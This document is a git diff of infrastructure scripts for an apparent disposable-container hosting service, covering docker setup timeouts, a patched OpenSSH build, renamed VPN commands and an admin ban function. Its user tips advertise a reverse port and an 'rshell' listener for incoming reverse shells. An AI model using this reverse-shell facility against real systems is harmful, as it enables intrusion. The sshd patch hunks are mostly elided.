-	[[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull docker exec --user 0:0 "lg-${LID}" curl -s sf/port
+	[[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull timeout 2 docker exec --user 0:0 "lg-${LID}" curl -s sf/port


 	# Warn user if this is the last server by IP (after semaphore has been released)
@ -1400,7 +1390,7 @@ exec_devnull docker exec sf-master /ready-lg.sh "${LID}" "${C_IP}" "${LG_PID}" "
 # Setup container (within container's namespace)
 unset WGNAME_UP
 [[ -s "${SF_USER_DB_DIR}/wg/name_up" ]] && WGNAME_UP="$(<"${SF_USER_DB_DIR}/wg/name_up")"
-exec_devnull docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..."
+exec_devnull timeout 5 docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..."
 touch "/config/self-for-guest/lg-${LID}/THIS-DIRECTORY-IS-IN-MEMORY-ONLY"
 tofile "${C_IP:?}" "/config/self-for-guest/lg-${LID}/c_ip"

--- a/host/mk_sshd.sh
+++ b/host/mk_sshd.sh
@ -11,11 +11,17 @@
 DSTDIR="/src/fs-root/usr/sbin"
 DSTBIN="${DSTDIR}/sshd"
 set -e
-SRCDIR="/tmp/openssh-9.2p1"
+SRCDIR="/src/dev/openssh-${VER:?}-sf"
+[[ ! -d "/src/dev" ]] && mkdir -p "/src/dev"
+cd /src/dev
 [[ ! -d "$SRCDIR" ]] && {
 	# Cloudflare to often returns 503 - "BLOCKED"
 	# wget -O- https://cloudflare.cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
-	wget -O- https://artfiles.org/openbsd/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
+	wget "https://artfiles.org/openbsd/OpenSSH/portable/openssh-${VER}.tar.gz"
+	tar xfz "openssh-${VER}.tar.gz"
+	mv "openssh-${VER}" "openssh-${VER}-orig"
+	tar xfz "openssh-${VER}.tar.gz"
+	mv "openssh-${VER}" "${SRCDIR}"

 	cd "$SRCDIR"

@ -39,5 +45,5 @@ strip sshd
 [[ ! -d "${DSTDIR}" ]] && mkdir -p "${DSTDIR}"
 cp sshd "${DSTBIN}"
 chmod 755 "${DSTBIN}"
-rm -rf "${SRCDIR:?}"
+# rm -rf "${SRCDIR:?}"

--- a/host/sf-sshd.patch
+++ b/host/sf-sshd.patch
@ -1,7 +1,7 @@
-diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-sf/channels.c
--- openssh-9.2p1-orig/channels.c	2023-02-02 12:21:54
-+++ openssh-9.2p1-sf/channels.c	2023-08-15 06:13:05
-@@ -3639,7 +3639,7 @@
+diff -x !*.[ch] -u openssh-9.6p1-orig/channels.c openssh-9.6p1-sf/channels.c
+--- openssh-9.6p1-orig/channels.c	2023-12-18 14:59:50
+++ openssh-9.6p1-sf/channels.c	2024-01-20 17:50:15
+@@ -3683,7 +3683,7 @@
 	ssh->chanctxt->IPv4or6 = af;
 }
 
@ -10,7 +10,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
 /*
  * Determine whether or not a port forward listens to loopback, the
  * specified address or wildcard. On the client, a specified bind
-@@ -3677,6 +3677,7 @@
+@@ -3721,6 +3721,7 @@
 			 * address and it was overridden.
 			 */
 			if (*listen_addr != '\0' &&
@ -18,10 +18,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
 			    strcmp(listen_addr, "0.0.0.0") != 0 &&
 			    strcmp(listen_addr, "*") != 0) {
 				ssh_packet_send_debug(ssh,
-diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1-sf/serverloop.c
--- openssh-9.2p1-orig/serverloop.c	2023-02-02 12:21:54
-+++ openssh-9.2p1-sf/serverloop.c	2023-08-15 06:18:17
-@@ -102,6 +102,12 @@
+diff -x !*.[ch] -u openssh-9.6p1-orig/serverloop.c openssh-9.6p1-sf/serverloop.c
+--- openssh-9.6p1-orig/serverloop.c	2023-12-18 14:59:50
+++ openssh-9.6p1-sf/serverloop.c	2024-01-20 17:50:15
+@@ -101,6 +101,12 @@
 /* requested tunnel forwarding interface(s), shared with session.c */
 char *tun_fwd_ifnames = NULL;
 
@ -34,7 +34,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
 /* returns 1 if bind to specified port by specified user is permitted */
 static int
 bind_permitted(int port, uid_t uid)
-@@ -391,8 +397,10 @@
+@@ -388,8 +394,10 @@
 			/* Clean up sessions, utmp, etc. */
 			cleanup_exit(255);
 		}
@ -46,7 +46,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
 		if (conn_in_ready &&
 		    process_input(ssh, connection_in) < 0)
 			break;
-@@ -637,12 +645,14 @@
+@@ -634,12 +642,14 @@
 
 	if (strcmp(ctype, "session") == 0) {
 		c = server_request_session(ssh);
@ -67,7 +67,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
 	}
 	if (c != NULL) {
 		debug_f("confirm %s", ctype);
-@@ -802,8 +812,20 @@
+@@ -799,8 +809,20 @@
 			ssh_packet_send_debug(ssh, "Server has disabled port forwarding.");
 		} else {
 			/* Start listening on the port */
@ -90,10 +90,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
 		}
 		if ((resp = sshbuf_new()) == NULL)
 			fatal_f("sshbuf_new");
-diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/sshd.c
--- openssh-9.2p1-orig/sshd.c	2023-02-02 12:21:54
-+++ openssh-9.2p1-sf/sshd.c	2023-08-15 06:13:05
-@@ -536,8 +536,71 @@
+diff -x !*.[ch] -u openssh-9.6p1-orig/sshd.c openssh-9.6p1-sf/sshd.c
+--- openssh-9.6p1-orig/sshd.c	2023-12-18 14:59:50
+++ openssh-9.6p1-sf/sshd.c	2024-01-20 17:50:15
+@@ -531,8 +531,71 @@
 		return 0;
 	}
 }
@ -165,7 +165,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/ss
 privsep_postauth(struct ssh *ssh, Authctxt *authctxt)
 {
 #ifdef DISABLE_FD_PASSING
-@@ -576,8 +639,34 @@
+@@ -571,8 +634,34 @@
 
 	reseed_prngs();
 
--- a/master/cgi-bin/rpc
+++ b/master/cgi-bin/rpc
@ -47,6 +47,23 @@ Sanitize()
 	[[ "${#REQUEST_URI}" -gt 512 ]] && BAIL "To long!" "ATTACK" ": REQUEST_URI(${#REQUEST_URI})=${REQUEST_URI:0:32}..."
 }

+InitColors() {
+	# COLOR is set (to 'always')
+	Y=$CDY
+	C=$CDC
+	R=$CDR
+	RR=$CR
+	G=$CDG
+	B=$CB
+	M=$CDM
+	YY=$CY
+	W=$CW
+	N=$CN
+	F=$CF
+	ICON_ERROR="💥 "
+	ICON_WARN="💥 "
+}
+
 GetFormVars()
 {
 	local IFS
@ -71,7 +88,6 @@ GetFormVars()
 		[[ ${key} == "config" ]] && {
 			R_CONFIG="${val//[^[:alnum:]-_+\/.]}"
 			[[ ${R_CONFIG:0:1} == "-" ]] && unset R_CONFIG
-			[[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
 		}
 		[[ ${key} == "pass"* ]] && R_PASS="${val//[^[:print:]]}"
 		[[ ${key} == "user"* ]] && R_USER="${val//[^[:print:]]}"
@ -128,6 +144,9 @@ GetFormVars()
 			[[ ! "${WG_DEV}" =~ ^wg ]] && WG_DEV="wg${WG_DEV}"
 		}
 	done
+
+	[[ -n $COLOR ]] && InitColors
+	[[ -n "$R_CONFIG" ]] && [[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
 }

 # Load PID of WireGuard container
@ -685,9 +704,10 @@ BLPOP portd:response-${LID} 5" | redr) || return

 	# The PortD add's a /sf/run/self/reverse_forward.
 	echo -en "\
-${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N}
-${M}🤭 Tip${N}: Type ${C}rshell${N}
-${G}👾 New reverse Port is ${Y}${ipport}${CN}"
+${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N} for details.
+${M}🤭 Tip${N}: Type ${C}rshell${N} to start listening.
+${M}🛜 Tip${N}: Type ${C}curl sf/port${N} to assign a new port.
+${G}👾 Your reverse Port is ${Y}${ipport}${CN}"

 	# portd.sh automaticaly adds this to /config/self/reverse_*
 	exit
@ -807,22 +827,7 @@ cmd_wg_show()
 0<&- # Close STDIN
 Sanitize
 GetFormVars
-[[ -n $COLOR ]] && {
-	# COLOR is set (to 'always')
-	Y=$CDY
-	C=$CDC
-	R=$CDR
-	RR=$CR
-	G=$CDG
-	B=$CB
-	M=$CDM
-	YY=$CY
-	W=$CW
-	N=$CN
-	F=$CF
-	ICON_ERROR="💥 "
-	ICON_WARN="💥 "
-}
+


 [[ "${FCGI_CMD}" == "dmesg" ]] && {
@ -836,13 +841,13 @@ GetFormVars
 	# If it is >=2025 then you can remove this block (it's now served via curl sf/vpn/*)
 	[[ -n $SF_OVPN_HACK ]] && {
 		wg_net_init
-		[[ ${ARGS[1]} == 'vpn' ]] && {
-			source "/sf/bin/funcs_vpn.sh"
-			[[ ${ARGS[2]} == 'up'   ]] && cmd_vpn_up
-			[[ ${ARGS[2]} == 'show'   ]] && cmd_vpn_show
-			[[ ${ARGS[2]} == 'del'  ]] && cmd_vpn_del
-			[[ ${ARGS[2]} == 'down' ]] && cmd_vpn_del
-			cmd_vpn_help
+		[[ ${ARGS[1]} == 'ovpn' ]] && {
+			source "/sf/bin/funcs_ovpn.sh"
+			[[ ${ARGS[2]} == 'up'   ]] && cmd_ovpn_up
+			[[ ${ARGS[2]} == 'show'   ]] && cmd_ovpn_show
+			[[ ${ARGS[2]} == 'del'  ]] && cmd_ovpn_del
+			[[ ${ARGS[2]} == 'down' ]] && cmd_ovpn_del
+			cmd_ovpn_help
 			exit
 		} 
 	}
@ -869,14 +874,14 @@ wg_net_init
 	exit
 }

-[[ "${FCGI_CMD}" == "vpn" ]] && {
-	source "/sf/bin/funcs_vpn.sh"
-	[[ ${ARGS[1]} == 'up'   ]] && cmd_vpn_up
-	[[ ${ARGS[1]} == 'show'   ]] && cmd_vpn_show
-	[[ ${ARGS[1]} == 'del'  ]] && cmd_vpn_del
-	[[ ${ARGS[1]} == 'down' ]] && cmd_vpn_del
+[[ "${FCGI_CMD}" == "ovpn" ]] && {
+	source "/sf/bin/funcs_ovpn.sh"
+	[[ ${ARGS[1]} == 'up'   ]] && cmd_ovpn_up
+	[[ ${ARGS[1]} == 'show'   ]] && cmd_ovpn_show
+	[[ ${ARGS[1]} == 'del'  ]] && cmd_ovpn_del
+	[[ ${ARGS[1]} == 'down' ]] && cmd_ovpn_del
 	# [[ ${ARGS[1]} == 'show' ]] && cmd_wg_show
-	cmd_vpn_help
+	cmd_ovpn_help

 	exit
 }
--- a/master/ready-lg.sh
+++ b/master/ready-lg.sh
@ -19,7 +19,9 @@ USER_UL_RATE="$5"
 LID_PROMPT_FN="/dev/shm/sf/self-for-guest/lg-${LID}/prompt"

 # Create 'empty' for ZSH's prompt to show WG EXIT
-[[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"
+# [[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"
+# Overwrite existing. Will be re-created by sf-setup.sh if WG-NET is up still. 
+:>"${LID_PROMPT_FN}"

 set -e
 LG_MAC=$(docker inspect -f '{{ (index .NetworkSettings.Networks "sf-guest").MacAddress }}' "lg-${LID:?}")
--- a/provision/env.example
+++ b/provision/env.example
@ -37,7 +37,7 @@ SF_MULLVAD_IP=172.20.0.252
 SF_MULLVAD_ROUTE=10.124.0.0/22
 SF_NOVPN_IP=172.20.0.240
 SF_NGINX_IP=172.20.1.80
-SF_RPC_IP=10.11.0.2
+SF_RPC_IP=100.126.224.2
 SF_GSNC_IP=172.22.0.21
 SF_SSHD_IP=172.22.0.22
 SF_DOH_IP=172.23.0.2
@ -49,9 +49,9 @@ SF_NET_ONION=10.111.0.0/16
 SF_NET_VPN=172.20.0.0/24
 SF_NET_VPN_DNS_IP=172.20.0.53

-SF_NET_LG=10.11.0.0/24
-SF_NET_LG_ROUTER_IP=10.11.0.1
-SF_NET_LG_ROUTER_IP_DUMMY=10.11.0.254
+SF_NET_LG=100.126.224.0/22
+SF_NET_LG_ROUTER_IP=100.126.224.1
+SF_NET_LG_ROUTER_IP_DUMMY=100.126.227.254

 SF_NET_VPN_ROUTER_IP=172.20.0.2

--- a/sfbin/funcs.sh
+++ b/sfbin/funcs.sh
@ -5,7 +5,7 @@ CY="\e[1;33m" # yellow
 CG="\e[1;32m" # green
 CR="\e[1;31m" # red
 CC="\e[1;36m" # cyan
-# CM="\e[1;35m" # magenta
+CM="\e[1;35m" # magenta
 CW="\e[1;37m" # white
 CB="\e[1;34m" # blue
 CF="\e[2m"    # faint
--- a/sfbin/funcs_admin.sh
+++ b/sfbin/funcs_admin.sh
@ -14,6 +14,7 @@ _self_for_guest_dir="${_sf_shmdir}/self-for-guest"
 _sf_basedir="/sf"
 _sf_dbdir="${_sf_basedir}/config/db"
 unset _sf_isinit
+_sf_region="$(hostname)"

 _sf_deinit()
 {
@ -507,27 +508,29 @@ lgrm()
 lgban()
 {
 	local fn
+	local hn
 	local ip
 	local msg
-	local lid
+	local lglid="${1}"

 	_sf_init
-	lid="${1}"
 	shift 1

-	fn="${_self_for_guest_dir}/${lid}/ip"
+	fn="${_self_for_guest_dir}/${lglid}/ip"
 	[[ -f "$fn" ]] && {
 		ip=$(<"$fn")
+		fn="${_self_for_guest_dir}/${lglid}/hostname"
+		[[ -f "${fn}" ]] && hn=$(<"${fn}")
 		fn="${_sf_dbdir}/banned/ip-${ip:0:18}"
 		[[ ! -e "$fn" ]] && {
 			[[ $# -gt 0 ]] && msg="$*\n"
-			echo -en "$msg" >"${fn}"
+			echo -en "# ${CY}${hn:-NAME} ${CDY}${_sf_region:-REGION} ${lglid} ${ip:0:18}${CN}\n$msg" >"${fn}"
 		}
 		echo "Banned: $ip"
 	}

-	lgstop "${lid}" "$@"
-	#_sf_lgrm "${lid}" # Dont lgrm here and give user chance to explain to re-instate his server.
+	lgstop "${lglid}" "$@"
+	#_sf_lgrm "${lglid}" # Dont lgrm here and give user chance to explain to re-instate his server.

 	_sf_deinit
 }
--- a/sfbin/funcs_ovpn.sh
+++ b/sfbin/funcs_ovpn.sh
@ -6,7 +6,7 @@

 [[ -z "$SF_GUEST_MTU" ]] && SF_GUEST_MTU=$((SF_HOST_MTU - 80))

-cmd_vpn_help() {
+cmd_ovpn_help() {
    	echo -en "\
 Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\"${N}
 Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\" -d user=username -d pass=password${N}
@ -241,7 +241,7 @@ vpn_stop() {
    nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F FORWARD 2>/dev/null
 }

-cmd_vpn_show() {
+cmd_ovpn_show() {
    load_lg
    [[ -f "/tmp/lg-${LID:-?}/conf/conn.ovpn" ]] && {
        echo -e "${C}"
@ -252,12 +252,12 @@ cmd_vpn_show() {
    exit
 }

-cmd_vpn_up() {
+cmd_ovpn_up() {
    local str
 	load_lg
    local link_mtu

-    [[ -z "$R_CONFIG" ]] && cmd_vpn_help
+    [[ -z "$R_CONFIG" ]] && cmd_ovpn_help
    WG_DEV="vpnEXIT"
    # echo "PID=$PID"

@ -379,7 +379,7 @@ Use ${C}curl sf/vpn/down${N} to disconnect.
    exit
 }

-cmd_vpn_del() {
+cmd_ovpn_del() {
    load_lg

    vpn_stop